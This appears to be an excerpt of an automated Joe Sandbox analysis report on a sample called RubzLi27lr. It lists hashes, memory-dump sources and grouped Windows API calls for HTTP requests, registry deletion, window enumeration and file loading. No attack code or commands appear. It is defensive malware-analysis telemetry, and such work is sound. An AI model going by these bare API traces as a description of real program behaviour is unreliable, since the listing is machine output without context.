                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                  • API String ID: 221274066-3440237614
                                                                                                                  • Opcode ID: 8dfb45a226838bb938e05f20ebcc6c9175645eb246ce19519339112fc5898f4a
                                                                                                                  • Instruction ID: 8b55e04e4fbf910e711f9530f568372c61cf3743ca81c9858c0d45197a906222
                                                                                                                  • Opcode Fuzzy Hash: 8dfb45a226838bb938e05f20ebcc6c9175645eb246ce19519339112fc5898f4a
                                                                                                                  • Instruction Fuzzy Hash: 0B617571108301AFD701EF64DD85DABBBF8EF89750F00496EF696932A1DB309A09CB52
                                                                                                                  APIs
                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B2C4B0
                                                                                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B2C4C3
                                                                                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B2C4D7
                                                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B2C4F0
                                                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00B2C533
                                                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B2C549
                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B2C554
                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B2C584
                                                                                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B2C5DC
                                                                                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B2C5F0
                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B2C5FB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3800310941-3916222277
                                                                                                                  • Opcode ID: 8a915d37552678d6596c09da5d8c900240b2f8a66abeed5914281fc1da7496cf
                                                                                                                  • Instruction ID: 81cd8caa572cd5544e7b7a3cbd5f17fe0c90592745088b44388bb53b984ce683
                                                                                                                  • Opcode Fuzzy Hash: 8a915d37552678d6596c09da5d8c900240b2f8a66abeed5914281fc1da7496cf
                                                                                                                  • Instruction Fuzzy Hash: 235169B4500618BFEB219FA0D989AAF7FFCFF19744F00445AF94A97210DB74EA049B60
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00B48592
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B485A2
                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B485AD
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B485BA
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00B485C8
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B485D7
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00B485E0
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B485E7
                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B485F8
                                                                                                                  • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00B4FC38,?), ref: 00B48611
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00B48621
                                                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00B48641
                                                                                                                  • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00B48671
                                                                                                                  • DeleteObject.GDI32(?), ref: 00B48699
                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B486AF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3840717409-0
                                                                                                                  • Opcode ID: 524493432612135c553676656f9041872a1d4059b71b2914baff8f127c565477
                                                                                                                  • Instruction ID: 26b1d6b8116135edfb9122ebcc54cadb36375f8c061b274781dce86ef27e6a71
                                                                                                                  • Opcode Fuzzy Hash: 524493432612135c553676656f9041872a1d4059b71b2914baff8f127c565477
                                                                                                                  • Instruction Fuzzy Hash: 4D411C75601204BFDB519FA9DC88EAE7BB8FF9AB11F114058F905E7260DB709E01DB60
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00B21502
                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00B2150B
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00B21517
                                                                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00B215FB
                                                                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 00B21657
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00B21708
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00B2178C
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00B217D8
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00B217E7
                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00B21823
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                  • API String ID: 1234038744-3931177956
                                                                                                                  • Opcode ID: d57ad223e8f1b7eb60a1e82cc93a744906cc398eec95ef73f46215d66b81fa64
                                                                                                                  • Instruction ID: 848b941bbeb9148df4fe9c75fb7157911f9e70c819220973b2718d134ad7c9dc
                                                                                                                  • Opcode Fuzzy Hash: d57ad223e8f1b7eb60a1e82cc93a744906cc398eec95ef73f46215d66b81fa64
                                                                                                                  • Instruction Fuzzy Hash: 90D1F171A00225DBDB009F69E985BB9B7F5FF65700F1088DAF40AAB291DB30DD41DB62
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                    • Part of subcall function 00B3C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B3B6AE,?,?), ref: 00B3C9B5
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3C9F1
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3CA68
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3CA9E
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B3B6F4
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B3B772
                                                                                                                  • RegDeleteValueW.ADVAPI32(?,?), ref: 00B3B80A
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00B3B87E
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00B3B89C
                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00B3B8F2
                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B3B904
                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B3B922
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00B3B983
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B3B994
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                  • API String ID: 146587525-4033151799
                                                                                                                  • Opcode ID: bb414629b7ce8882c5e9be5f12d273574c3ef34c454d8d918819d9a4f2b8ab77
                                                                                                                  • Instruction ID: 8a32acf4f76eb072ed1bfab52a07a400c71120d5b5fd83050adabdde564fffb4
                                                                                                                  • Opcode Fuzzy Hash: bb414629b7ce8882c5e9be5f12d273574c3ef34c454d8d918819d9a4f2b8ab77
                                                                                                                  • Instruction Fuzzy Hash: 14C17C34204201AFD714DF24C495F6ABBE5FF84318F24859CF59A8B2A2CB75ED45CB91
                                                                                                                  APIs
                                                                                                                  • GetDC.USER32(00000000), ref: 00B325D8
                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B325E8
                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00B325F4
                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00B32601
                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00B3266D
                                                                                                                  • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00B326AC
                                                                                                                  • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00B326D0
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00B326D8
                                                                                                                  • DeleteObject.GDI32(?), ref: 00B326E1
                                                                                                                  • DeleteDC.GDI32(?), ref: 00B326E8
                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00B326F3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                  • String ID: (
                                                                                                                  • API String ID: 2598888154-3887548279
                                                                                                                  • Opcode ID: 79a2deeb473760f24123a9f88387f86a87e5c7de463053f85cac0222c5c50819
                                                                                                                  • Instruction ID: d433fd969787538766ca51658f30ebea653b3edcd5a657cf52f6b2e36866236f
                                                                                                                  • Opcode Fuzzy Hash: 79a2deeb473760f24123a9f88387f86a87e5c7de463053f85cac0222c5c50819
                                                                                                                  • Instruction Fuzzy Hash: EA61E075D01219EFCF04CFA8D885AAEBBF6FF48710F208569E955A7250D770AA41CFA0
                                                                                                                  APIs
                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 00AEDAA1
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED659
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED66B
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED67D
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED68F
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED6A1
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED6B3
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED6C5
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED6D7
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED6E9
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED6FB
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED70D
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED71F
                                                                                                                    • Part of subcall function 00AED63C: _free.LIBCMT ref: 00AED731
                                                                                                                  • _free.LIBCMT ref: 00AEDA96
                                                                                                                    • Part of subcall function 00AE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000), ref: 00AE29DE
                                                                                                                    • Part of subcall function 00AE29C8: GetLastError.KERNEL32(00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000,00000000), ref: 00AE29F0
                                                                                                                  • _free.LIBCMT ref: 00AEDAB8
                                                                                                                  • _free.LIBCMT ref: 00AEDACD
                                                                                                                  • _free.LIBCMT ref: 00AEDAD8
                                                                                                                  • _free.LIBCMT ref: 00AEDAFA
                                                                                                                  • _free.LIBCMT ref: 00AEDB0D
                                                                                                                  • _free.LIBCMT ref: 00AEDB1B
                                                                                                                  • _free.LIBCMT ref: 00AEDB26
                                                                                                                  • _free.LIBCMT ref: 00AEDB5E
                                                                                                                  • _free.LIBCMT ref: 00AEDB65
                                                                                                                  • _free.LIBCMT ref: 00AEDB82
                                                                                                                  • _free.LIBCMT ref: 00AEDB9A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 161543041-0
                                                                                                                  • Opcode ID: 02da672166a6b8261bcdabccff22c12a000fda20b3b8b21dcbced85c336de95d
                                                                                                                  • Instruction ID: e1872b229a64f07a9c8f534c129030102dc1717a8d49c20dc88ed4e06a5d7591
                                                                                                                  • Opcode Fuzzy Hash: 02da672166a6b8261bcdabccff22c12a000fda20b3b8b21dcbced85c336de95d
                                                                                                                  • Instruction Fuzzy Hash: 40318E326043889FEB21AB3AE946B5A77E8FF40354F125429F458DB192EF35ED40C720
                                                                                                                  APIs
                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00B1369C
                                                                                                                  • _wcslen.LIBCMT ref: 00B136A7
                                                                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B13797
                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00B1380C
                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00B1385D
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00B13882
                                                                                                                  • GetParent.USER32(?), ref: 00B138A0
                                                                                                                  • ScreenToClient.USER32(00000000), ref: 00B138A7
                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00B13921
                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00B1395D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                                  • String ID: %s%u
                                                                                                                  • API String ID: 4010501982-679674701
                                                                                                                  • Opcode ID: 936fcae28b12e9dce7eae130e64102e55d96c25b4757b2c20be38c62b17fb1d5
                                                                                                                  • Instruction ID: d35443911e37c255ea6b3a83fddb7bb601b464514c32eb163068735e59900051
                                                                                                                  • Opcode Fuzzy Hash: 936fcae28b12e9dce7eae130e64102e55d96c25b4757b2c20be38c62b17fb1d5
                                                                                                                  • Instruction Fuzzy Hash: 5891B471204606AFD719DF24C885FEAF7E8FF44B50F408569F99AD2190EB30EA85CB91
                                                                                                                  APIs
                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00B14994
                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00B149DA
                                                                                                                  • _wcslen.LIBCMT ref: 00B149EB
                                                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00B149F7
                                                                                                                  • _wcsstr.LIBVCRUNTIME ref: 00B14A2C
                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00B14A64
                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00B14A9D
                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00B14AE6
                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00B14B20
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00B14B8B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                  • String ID: ThumbnailClass
                                                                                                                  • API String ID: 1311036022-1241985126
                                                                                                                  • Opcode ID: 7240a1c1e0be9786e0b749e5b785f8173e23f52928468a58970c9bcd1728fe2b
                                                                                                                  • Instruction ID: b796d76335c2f4efba6d5b1ed7bc8b4659843028173c6b00cbed4c3d3efe5d6e
                                                                                                                  • Opcode Fuzzy Hash: 7240a1c1e0be9786e0b749e5b785f8173e23f52928468a58970c9bcd1728fe2b
                                                                                                                  • Instruction Fuzzy Hash: ED919D710082059FDB04CF14C985BEA7BE8FF85754F4484AAFD8A9B196DB30ED85CBA1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AC9BB2
                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B48D5A
                                                                                                                  • GetFocus.USER32 ref: 00B48D6A
                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00B48D75
                                                                                                                  • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00B48E1D
                                                                                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B48ECF
                                                                                                                  • GetMenuItemCount.USER32(?), ref: 00B48EEC
                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00B48EFC
                                                                                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B48F2E
                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B48F70
                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B48FA1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 1026556194-4108050209
                                                                                                                  • Opcode ID: d2752abc5733510daf373aa56c873bc8f0d4c4f7722b6f008781ffcdb1f66451
                                                                                                                  • Instruction ID: 4e1844d2d04be0bb4b11554a8a251604933f1bb8782d2646e998b11873853cdf
                                                                                                                  • Opcode Fuzzy Hash: d2752abc5733510daf373aa56c873bc8f0d4c4f7722b6f008781ffcdb1f66451
                                                                                                                  • Instruction Fuzzy Hash: E981DF71509311AFDB10CF24D884AAF7BE9FB89714F0009ADF98597291DF30DA05EBA2
                                                                                                                  APIs
                                                                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00B1DC20
                                                                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00B1DC46
                                                                                                                  • _wcslen.LIBCMT ref: 00B1DC50
                                                                                                                  • _wcsstr.LIBVCRUNTIME ref: 00B1DCA0
                                                                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00B1DCBC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                  • API String ID: 1939486746-1459072770
                                                                                                                  • Opcode ID: 7862cf8b2faa67069b1579c16055d5858ad077df45a81f32ed34f18267d1f27c
                                                                                                                  • Instruction ID: a12db55ea746e87749c5923a00352ea8cf72304e33cae8597c935d6937d6c106
                                                                                                                  • Opcode Fuzzy Hash: 7862cf8b2faa67069b1579c16055d5858ad077df45a81f32ed34f18267d1f27c
                                                                                                                  • Instruction Fuzzy Hash: 16410672A402047BDB10A774ED43FFF77ACEF56B10F5040AAF901A6293EB749A0197A5
                                                                                                                  APIs
                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00B3CC64
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00B3CC8D
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B3CD48
                                                                                                                    • Part of subcall function 00B3CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00B3CCAA
